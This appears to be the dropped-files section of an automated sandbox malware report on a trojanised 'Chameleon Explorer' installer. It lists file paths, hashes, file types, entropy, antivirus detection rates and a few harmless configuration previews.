                                                                                                                                      SSDEEP:12288:OXHZ/e0zlt8tEWmk37f72c4zHmIa0zydJXgvtd5/oTWisqhwjtmcre:OXHF1zlWmk3rq+grGAjre
                                                                                                                                      MD5:96F92C8368C1E922692F399DB96DA1EB
                                                                                                                                      SHA1:1A91D68F04256EF3BC1022BEB616BA65271BD914
                                                                                                                                      SHA-256:161408B86EED7C4D9A5882AA00DF3F8765ED28FA4FD9AAB2C9B3DCEADBD527F9
                                                                                                                                      SHA-512:B3D3FB2D78FE2DF864F0E07A8BC1610EE9D65251957E0495A34C1631895293590E0FCA965EC9DEB160F48A4E09A2FEABD3BFF6FB9A0C22888A941E308DE39D14
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1226272
                                                                                                                                      Entropy (8bit):5.8428341731794005
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:OXHZ/e0zlt8tEWmk37f72c4zHmIa0zydJXgvtd5/oTWisqhwjtmcre:OXHF1zlWmk3rq+grGAjre
                                                                                                                                      MD5:96F92C8368C1E922692F399DB96DA1EB
                                                                                                                                      SHA1:1A91D68F04256EF3BC1022BEB616BA65271BD914
                                                                                                                                      SHA-256:161408B86EED7C4D9A5882AA00DF3F8765ED28FA4FD9AAB2C9B3DCEADBD527F9
                                                                                                                                      SHA-512:B3D3FB2D78FE2DF864F0E07A8BC1610EE9D65251957E0495A34C1631895293590E0FCA965EC9DEB160F48A4E09A2FEABD3BFF6FB9A0C22888A941E308DE39D14
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):805400
                                                                                                                                      Entropy (8bit):6.529115621464912
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:vDS2QfWotczhwei2LiReVjKRuPJLOigmmy5fdkBAcvqwUvTuVNCz9WjAiL9izdPV:vU0zhW2LvV1JLO4LT75DyGlW4PapdEv
                                                                                                                                      MD5:DD5CE4D765EDD75EBA6F311E6E0EA10A
                                                                                                                                      SHA1:9EA7F6516E5AD0755B74463D427055F63ED1A664
                                                                                                                                      SHA-256:64B7F8F70A7B037D10DA72EAA769078B7E4D1AC8964C5EAE5515D373E816ED6D
                                                                                                                                      SHA-512:D2782310DF7CC533CC9FFAF5C1903D5BC6A500C3BBE48148C1339FB5DE19C835E4A8C765DA1B80B3744EA231353F76F22BA4E04C78A3D950D7EE291D6EAB2216
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Program Files (x86)\Chameleon Explorer\is-5C20L.tmp, Author: Joe Security
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):146536
                                                                                                                                      Entropy (8bit):5.3703743168809845
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:uXYKg56JP/jTk576nGaayaa+9oWjxDgUFUFwdTzuZ/AhR:uHPkUckUFUi1um
                                                                                                                                      MD5:246AAA95ABDDFD76F9166A2DAA9F2D73
                                                                                                                                      SHA1:0467FA8567B71F6E3A54D152D9EA77121C627798
                                                                                                                                      SHA-256:3F6880605A97FFB9B14CD97419A40CB2EA6CEFD616E417FE538031D633FB93B9
                                                                                                                                      SHA-512:FE2042E9CE22BE3E6E6FE1B324290AEDBC155C55C0EDE63CCF44A0EEA10CE9F626C7553C40B24D917E5A4A8FB70513B33D698F7DEF5091A50831FA0529E8E669
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1185824
                                                                                                                                      Entropy (8bit):6.406882852477582
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24576:EtdAm9DUi/CR3wCkCiRgoG7hBaHkbEXXeG/jFt5lTxyt7:8qTytRFk6ek1Lu
                                                                                                                                      MD5:729BC0108BCD7EC083DFA83D7A4577F2
                                                                                                                                      SHA1:0B4EFA5E1764B4CE3E3AE601C8655C7BB854A973
                                                                                                                                      SHA-256:B1C68B1582EBB5F465512A0B834CCAC095460B29136B6C7EEA0475612BF16B49
                                                                                                                                      SHA-512:49C83533CE88D346651D59D855CFF18190328795401C1277F4E3D32FF34F207D2C35F026785AA6C4A85624D88BF8C927654907FAF50DB1D57447730D9D6AC44C
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4644456
                                                                                                                                      Entropy (8bit):6.624930231136082
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:wo4YSsZdldgNivQrYsMSn6A59SQs3g/9ob2SSHmc9WhbDTOTI98uk5myyxsXFXzT:LJSsZdldgNimB59SQshb2SH9kwEzT
                                                                                                                                      MD5:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                                                      SHA1:940F504D835FC254602953495320BB92456177B9
                                                                                                                                      SHA-256:137723BDD388F6E5A50B7942EFF02F4CC70E6B86D8650A41F9E8956EA1E4DE3B
                                                                                                                                      SHA-512:015FFC133AD3A6937222BBC057F68B60ABFE22B900B5E7C4E6CA3EC7DC6B09ABAF54B595F00FA9212F370DA8531AF1AC5FC52B39953E1F685E81C66D1EC61F8A
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):768032
                                                                                                                                      Entropy (8bit):6.537086415352977
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:wo6ws4L29BHDesvpczEoPAc+qyH7JRHf4Z2R5oTf+y4vWUA692IAiL9+P/c3uyDq:wo6c2zHtxJQP22mNjweEV+mwar
                                                                                                                                      MD5:FB76F4F533203E40CE30612A47171F94
                                                                                                                                      SHA1:304BA296C77A93DDB033D52578FCC147397DB981
                                                                                                                                      SHA-256:3DE05F18FFE9FDA589A45EA539A464E58A30F70D59D71444B018064CF831C4A6
                                                                                                                                      SHA-512:A416A6D6EFBBD69209E1867F12B9D1D11B21160F6DFE07C510B43112C22C317F805C67DD9402744A6C7E1541F6B3A061C49942FE28FA70F74AEA670BA9C71995
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1275416
                                                                                                                                      Entropy (8bit):5.811103517353428
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:MhmMfYVQoycp8xjtxcGnzo9/cKEAdn9bIcxesezMlUJHDD2xx9q8:MY6ZtT+bI+4Mlk2xHq8
                                                                                                                                      MD5:DE5F74EF4E17B2DC8AD69A3E9B8D22C7
                                                                                                                                      SHA1:42DF8FEDC56761041BCE47B84BD4E68EE75448D2
                                                                                                                                      SHA-256:B89A6A57B48BE10103825440D2157F2C4A56E4C6B79AD13F729429CD5393BF32
                                                                                                                                      SHA-512:515E9B498D8CD9BB03F8D9758E891D073627DFD6FB0B931650A47D6E53722AA6E1CC3CAFF8C0E64F4721AD2ABEF7A81EF4E7B49952D3C8FC325DEB5BBA6B3314
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):15091304
                                                                                                                                      Entropy (8bit):6.181292047546881
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:98304:aVVZ2l4oeoFVuuaBABjcWvkEPGFta7xEmkLGg79M:aVHoeoFVzvBjbEdGg7u
                                                                                                                                      MD5:92A3D0847FC622B31F2D0C273A676C0E
                                                                                                                                      SHA1:E642D694367CC98A8863D87FEC82E4CF940EB48A
                                                                                                                                      SHA-256:9A9923C08D3FC5937B6ED189E20CF416482A079BC0C898C4ED75329E0EE3AE89
                                                                                                                                      SHA-512:01D13FD9A0DD52BC2E3F17AF7A999682201C99ECF7218BCA254A4944A483FD1DEC2A3E6D59DEF501A024AD760B849787902ECB55BD33D23FA9651C0A7689CD1C
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:InnoSetup Log Chameleon Explorer {96C45BE0-C1AA-41B3-B161-F331DBC29B84-, version 0x418, 52557 bytes, 405464\37\user\376, C:\Program Files (x86)\Chameleon Explorer\
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):52557
                                                                                                                                      Entropy (8bit):3.9174495073843554
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:4FYAxWNrPuxwK2BBnE9IuIuhqjulh9Lbr:0xkixl2BBnE9IuIuhk4T
                                                                                                                                      MD5:A0F710F566BB36346CC945ADBCC102A3
                                                                                                                                      SHA1:E2215C6ECE97E184AB441E2991F9B5D3AD08B687
                                                                                                                                      SHA-256:4EC09AAA226A0E12FD7E5F415FB43FBED30A520E5000E0445E30EA6112D1A4D2
                                                                                                                                      SHA-512:385A1785E73DDB00F686C28206B1D9753815E1F0F43CCFDA31B261677C448532A720C7365D9A903205E4C598E85044EF0B7B557D5BD4F0F79707CFC0F00E99BA
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1185824
                                                                                                                                      Entropy (8bit):6.406882852477582
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24576:EtdAm9DUi/CR3wCkCiRgoG7hBaHkbEXXeG/jFt5lTxyt7:8qTytRFk6ek1Lu
                                                                                                                                      MD5:729BC0108BCD7EC083DFA83D7A4577F2
                                                                                                                                      SHA1:0B4EFA5E1764B4CE3E3AE601C8655C7BB854A973
                                                                                                                                      SHA-256:B1C68B1582EBB5F465512A0B834CCAC095460B29136B6C7EEA0475612BF16B49
                                                                                                                                      SHA-512:49C83533CE88D346651D59D855CFF18190328795401C1277F4E3D32FF34F207D2C35F026785AA6C4A85624D88BF8C927654907FAF50DB1D57447730D9D6AC44C
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:InnoSetup messages, version 5.5.3, 221 messages (UTF-16), &About Setup...
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):22709
                                                                                                                                      Entropy (8bit):3.2704486925356004
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:Q41EjXgkg3Sqf8sfr69FT0AKanzLYfMa1tzvL7Vzo+Fc51USQDztXfbKJUfvo:Q41Elvqf9r6fKVfMmRo+y1USQDztP3o
                                                                                                                                      MD5:79173DA528082489A43F39CF200A7647
                                                                                                                                      SHA1:AA253B477CE2BF9D886D07694CD5DDB7C7FE9EEC
                                                                                                                                      SHA-256:4F36E6BE09CD12E825C2A12AB33544744E7256C9094D7149258EA926705E8FFD
                                                                                                                                      SHA-512:C46EB9DD3D03A993FDC4F65AE2751ECFDCB1FB6E1FB69A119105FD40290CE5EC4427B04F813EED47415390689943D05B5432D4571B1ACA0CE37EE52391790D18
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Wed Feb 22 15:08:14 2023, mtime=Wed Feb 22 15:08:14 2023, atime=Sat Dec 24 21:19:16 2016, length=15091304, window=hide
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1213
                                                                                                                                      Entropy (8bit):4.5920770213446
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:8mUmE/DJdOEA+HDqElS1llAiKQdCHqhdCVUUygGs7aB6m:8mUmQDJdOR+jqElSPOiKQdCKhdCWOcB6
                                                                                                                                      MD5:B841A6D3FB67E969D38C533B1705E66E
                                                                                                                                      SHA1:1E182E5D2347A64A3ECB611CD485B3F16DC1F1C2
                                                                                                                                      SHA-256:5745AB86DA0878499B9E68EBC348A760310CEB4DD9F0E8B4D735F3AA9E1E800C
                                                                                                                                      SHA-512:F70F5EFE6581D9AC8B82F3307485F77B49243B8F4E4BA161D933269FB8486B6CEAE8C5BEF5BA776DB6672C9BFC8E99BB9571042D1DC62B1A1E94921EF9C3DB28
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Wed Feb 22 15:08:14 2023, mtime=Wed Feb 22 15:08:14 2023, atime=Sat Dec 24 21:19:16 2016, length=15091304, window=hide
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1195
                                                                                                                                      Entropy (8bit):4.592811455946389
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:8mUmE/K4/dOEA+HDqElS1llAiK3dCHqhdCVUUygGs7aB6m:8mUmQK4/dOR+jqElSPOiK3dCKhdCWOcs
                                                                                                                                      MD5:A491248D4752E4B9749729447568B589
                                                                                                                                      SHA1:E8E0072B50D49082882662B611B73EAFCD241EFD
                                                                                                                                      SHA-256:844A30F18B62217492963D3A84FAF7F135DF587C8DF517A53828B16EE6D7AB62
                                                                                                                                      SHA-512:589A497CC6775C7FDE0B34915D18F1B8D76924392DC707D435F0D028DB366E455E3C04B69AD40F931F68A92D2D3911171BAE1834558D16B6D97819EDA8913193
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):6860752
                                                                                                                                      Entropy (8bit):7.995791234867719
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:196608:ZIwvgsb87DwQiiFFL4an2L/dfXaI+fVcZg:33Stl4LL/ZaIg
                                                                                                                                      MD5:B2E5A8FE3CA4F0CD681B5662F972EA5F
                                                                                                                                      SHA1:B7DBCFAEE55ECBF0158431D85DABDD479AB449C7
                                                                                                                                      SHA-256:E71C48C03B8CFD37BF17E62460733A4BFE9C484E947FD9DB291F65405A2BA9E8
                                                                                                                                      SHA-512:40B7140F5C182CD51CEE142A2575BD70DC9BDE311AD3952119FB9769B5CEEB467695AA5A66FC90520712D9A39458930EFB965496D6443665B7597CFD66247AAF
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                      Process:C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):236438
                                                                                                                                      Entropy (8bit):7.953392973061269
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:EwmyOUCaZaI4GDXdgOIsNstrbJaNzjD46ElEvmM+0/iHy8xTqYPt/Gh2IoZfd0:EX4lZhDXdtICFNzX46EevZDiSQltaeF0
                                                                                                                                      MD5:F7D02B4274D39BFE8DFB0CAD3370C58C
                                                                                                                                      SHA1:7A04F431DEB26B7CA85EBF984801AE1B0A36E839
                                                                                                                                      SHA-256:7298447DDFE39CDA1F174D586910B1E34B537DD94CE67BF221828E012F338C0C
                                                                                                                                      SHA-512:F1C32F60C056FDF4633FDBE19DE441599255D52D342039194AF5901AB58203F079A83386D118FA597EA61A9B242AA0F10586ABEA102DB8B4A0067B4990A8DB08
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Roaming\cexplorer.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1185824
                                                                                                                                      Entropy (8bit):6.406882852477582
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24576:EtdAm9DUi/CR3wCkCiRgoG7hBaHkbEXXeG/jFt5lTxyt7:8qTytRFk6ek1Lu
                                                                                                                                      MD5:729BC0108BCD7EC083DFA83D7A4577F2
                                                                                                                                      SHA1:0B4EFA5E1764B4CE3E3AE601C8655C7BB854A973
                                                                                                                                      SHA-256:B1C68B1582EBB5F465512A0B834CCAC095460B29136B6C7EEA0475612BF16B49
                                                                                                                                      SHA-512:49C83533CE88D346651D59D855CFF18190328795401C1277F4E3D32FF34F207D2C35F026785AA6C4A85624D88BF8C927654907FAF50DB1D57447730D9D6AC44C
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):6144
                                                                                                                                      Entropy (8bit):4.720366600008286
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                      MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                      SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                      SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                      SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:PC bitmap, Windows 3.x format, 550 x 400 x 8, resolution 3780 x 3780 px/m, 256 important colors, cbSize 221878, bits offset 1078
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):221878
                                                                                                                                      Entropy (8bit):2.943873456317086
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:kAm32YDp95sTuEA8dXMhQp/NeHL/msCc1J1yDusX7W4GqOQlDq3mh9h7EER0V6FP:QzcZbRj
                                                                                                                                      MD5:5C462496481201B9E9D855A30CEBC0CF
                                                                                                                                      SHA1:A0105BF0140DAC14C9ACDB07CB0740D3FD611724
                                                                                                                                      SHA-256:D67EC0D4146B0C030703BDC405ACD2B6EB7E7A302D65B3F339D9D45AFC05AC52
                                                                                                                                      SHA-512:08D4CD904D88FC97E1DFB6AAA83D4CCDF8CF4776D7D16FDE5B067ED81C65E89CA03EA0937532E0AD2E37F19C283C488E9C5EDB05366389F0848F11D1856D42C1
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Roaming\update.exe
                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16384
                                                                                                                                      Entropy (8bit):2.1030849329474686
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:JKMxnV88nMGcrl9fbjWB4Rvzs1HlMYSfQsQ:JKMxG8MZLWavIbkfQv
                                                                                                                                      MD5:5EBA272FAA8B455AB9510F83C48D9CB2
                                                                                                                                      SHA1:3A61BA4DF62A7A19E57EB1525385762B74859ED4
                                                                                                                                      SHA-256:E38E1B143BA8E3D15C7A10DE9CE7A43FCCBAD76B554772AA56A42853C63C76CE
                                                                                                                                      SHA-512:D3C92682762B2FB93FB94367295AA8E76940EB3A59335837D56697605902F536E18678662A50259AF5CBB697A93D505755F4501F3CF6D7E671DC401CAA8B760D
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):6860752
                                                                                                                                      Entropy (8bit):7.995791234867719
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:196608:ZIwvgsb87DwQiiFFL4an2L/dfXaI+fVcZg:33Stl4LL/ZaIg
                                                                                                                                      MD5:B2E5A8FE3CA4F0CD681B5662F972EA5F
                                                                                                                                      SHA1:B7DBCFAEE55ECBF0158431D85DABDD479AB449C7
                                                                                                                                      SHA-256:E71C48C03B8CFD37BF17E62460733A4BFE9C484E947FD9DB291F65405A2BA9E8
                                                                                                                                      SHA-512:40B7140F5C182CD51CEE142A2575BD70DC9BDE311AD3952119FB9769B5CEEB467695AA5A66FC90520712D9A39458930EFB965496D6443665B7597CFD66247AAF
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                      Process:C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):602376
                                                                                                                                      Entropy (8bit):7.209153215805898
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:je5aQr1vqfbmjDfqm02hkJcuosc4Z7j0SGScPqrnCu:jkhifKjDmykJc3sr/foGCu
                                                                                                                                      MD5:CF1EDC23E7EB941A4231A322C08C22B4
                                                                                                                                      SHA1:63B1365441FD0B0BBBF1E1DFF4704AE73D836CA2
                                                                                                                                      SHA-256:109591C2907EA03434300B093B5E15D1F742A6CE18FA8D2D658A26BFE424F0B3
                                                                                                                                      SHA-512:C9601F2BF13DB021A80BBE914BD471981EC37A343CABF054FA27A311E7E374DEDAD5907C495B20D2A17C9399F881DAB882BA17D48E0F0BF493BF0DC5124D47B2
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 80%
                                                                                                                                      Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):736
                                                                                                                                      Entropy (8bit):5.19291613287325
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:71WWe2T/GYxe4EfiYP/LpT7TAiE6AufSEnh9mgyzYhG:71//psEkSgrG
                                                                                                                                      MD5:8DD2C4351E4B0D2930D563DA2C6C2A48
                                                                                                                                      SHA1:A1B468692AC3F74F9A2550AEAAFF0D9624513C71
                                                                                                                                      SHA-256:EFCA88B595BB73EFCEBA76EC7563B29AC32C4B5A86217C4BF1FBB68B1FFC0F5C
                                                                                                                                      SHA-512:F9C409B25AA07AD3B4421A841AD9F1139CC2B134F47EF8844D948367B5D30107F7BB5FDB1EC3B15D1CB5460631405784B57046CF8174BF8D05A6ED62847A0C08
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.[0]..Masks=.txt;.doc;.docx;.xls;.xlsx;.pdf;.rtf;.odt;.ods;.chm;.ini;.mobi;.epub;.azw;.djvu;.fb2..Enabled=0..ColorText=5283896..ColorBack=-1....[1]..Masks=.png;.jpg;.jpeg;.gif;.bmp;.tif;.tiff;.psd;.ico..Enabled=0..ColorText=5718738..ColorBack=-1....[2]..Masks=.avi;.mpg;.wmv;.mkv;.mpeg;.flv;.mp4;.vob;.mov;.divx..Enabled=0..ColorText=26316..ColorBack=-1....[3]..Masks=.mp3;.wav;.flac;.ape;.ogg..Enabled=0..ColorText=33023..ColorBack=-1....[4]..Masks=.exe;.bat;.msi;.application;.cmd..Enabled=1..ColorText=6830483..ColorBack=-1....[5]..Masks=.dll;.ocx..Enabled=0..ColorText=15728760..ColorBack=-1....[6]..Masks=.zip;.rar;.7z;.cab;.gz;.tar..Enabled=1..ColorText=13797186..ColorBack=-1....[IntegrityCheckingSignature]..Finish=Success....
                                                                                                                                      Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):793
                                                                                                                                      Entropy (8bit):5.017107027448105
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:4aoIJ8i3quu5IJ0x9KIuuPI5VuujpI6Tp0iuuHG:4aoIK6q1IJ0OITI7vpIqjG
                                                                                                                                      MD5:D0E6E59B4C0A90FF05AEAEA3B850E780
                                                                                                                                      SHA1:1E975637110EF7EEE57C739E5B208D624F2D44C4
                                                                                                                                      SHA-256:99428152166486929659D14D11FB12822E2DC5EFF9FA43706C35407A45FCA898
                                                                                                                                      SHA-512:62522B9BA3557BDE691945EEED75C05C53146D05E9632D6EF5BFAE083FCF52F885277398E4E9853432C2E1366ACBC5FA8E73BA08584AD36C52C70F00869CC0CD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.[Settings]..MaxFilterIndex=4....[3]..Name=Images..IncludeFilter=*.jpg;*.jpeg;*.png;*.tiff;*.gif;*.bmp;*.webp;*.psd;*.svg;*.psp;*.tga;*.ai;*.cdr..ExcludeFilter=..ShowHiddenFiles=0..IncludeSubFolder=0....[4]..Name=Documents..IncludeFilter=*.doc;*.docx;*.txt;*.rtf;*.xls;*xlsx;*.odt;*.ods;*.pdf;*.djvu;*.mobi;*.epub;*.fb2;*.ppt;*.pptx..ExcludeFilter=..ShowHiddenFiles=0..IncludeSubFolder=0....[2]..Name=Audio..IncludeFilter=*.mp3;*.wav;*.flac;*.ape;*.3gp;*.amr;*.m4a;*.m4p;*.ogg;*.oga;*.ra;*.rm;*.wv;*.wma..ExcludeFilter=..ShowHiddenFiles=0..IncludeSubFolder=0....[1]..Name=Video..IncludeFilter=*.avi;*.mkv;*.mp4;*.mov;*.wmv;*.flv;*.divx;*.ts;*.mpeg;*.vob;*.3gp;*.webm;*.flv;*.mpg;*.mp4..ExcludeFilter=..ShowHiddenFiles=0..IncludeSubFolder=0....[IntegrityCheckingSignature]..Finish=Success....
                                                                                                                                      Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1029
                                                                                                                                      Entropy (8bit):5.073046635157514
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:ilPKE3YE39E3IE3ZE3nVmxE3vxE36TpE3laNE3RE3zE3ZjxE3Fg9lKE34G:eSFIt4kVciz+aNoeABMjG
                                                                                                                                      MD5:F5561BEACF73E8F22AE653BCB64E2E75
                                                                                                                                      SHA1:7E2040EA37E77A593B16F66131958C9BC39B14F5
                                                                                                                                      SHA-256:DD3B1B6E081034B6EA7B43FA7BCD2E008F7228A89014ECF8465863ADB8C04CD3
                                                                                                                                      SHA-512:96F65778464684030AA2A31422EE7A5CC4683C6C975DB600C4CFEBD5B9ED8CC1B9213F07A2B3EBBDB73868C44CCE027999C6CC6B61AFD30864434E741D38EF4F
                                                                                                                                      Malicious:false
